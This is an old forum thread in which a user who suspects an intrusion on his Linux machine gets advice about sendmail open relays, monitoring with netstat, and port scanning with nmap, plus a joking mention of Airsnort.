Not to be an a** but if you have no idea what is going on with your system, it may be time to reinstall, and rethink your system's security before you offer services that you don't know how to control.
EDIT:
Since when is Brazil in North Africa?
chort
06-28-2003, 05:59 AM
It sounds like your sendmail is probably an open relay. Consider implementing some basic security.
See, this is why I don't believe a default Linux distro is any more secure than default WinXP.
Originally posted by chort
See, this is why I don't believe a default Linux distro is any more secure than default WinXP.
a bit of a generalization. depends on the distro.
some don't have any MTA by default, unless you install it yourself.
mrbl0nde
06-28-2003, 06:01 PM
802.11: your problem is a very interesting one, and i'm sure everyone here is glad to help in any way that they can. however, your messages are a bit cryptic. what i mean is, it is very hard to understand what you are trying to say at times from your grammar. if you could be a little more clear in your posts it would be helpful.
zynaps
06-30-2003, 02:35 AM
In future it might be a good idea to portscan for common trojan ports when you suspect you're under attack from a host - this might give an indication as to whether the host is an unwitting proxy or the attacker's machine.
Just a thought. :)
zynaps
802.11
06-30-2003, 08:47 AM
the co-worker has physical access and he builds his own account.
I always monitor with "netstat -taun"
what do I need to install to do portscanning??
Originally posted by 802.11
the co-worker has physical access and he builds his own account.
I always monitor with "netstat -taun"
what do I need to install to do portscanning??
nmap, the best portscan tool :D
www.insecure.org
andycrofts
07-01-2003, 05:05 PM
...but the way that this nerd got into your machine wouldn't in the remotest chance be connected to your nickname???
Airsnort for your root password.....
802.11
07-05-2003, 04:33 PM
what does "airsnort root password" mean?
can you show me how to use "simple" snort?
mdwatts
07-05-2003, 05:06 PM
airsnort (http://www.google.com/linux?hl=en&lr=lang_en&ie=ISO-8859-1&q=airsnort&btnG=Google+Search)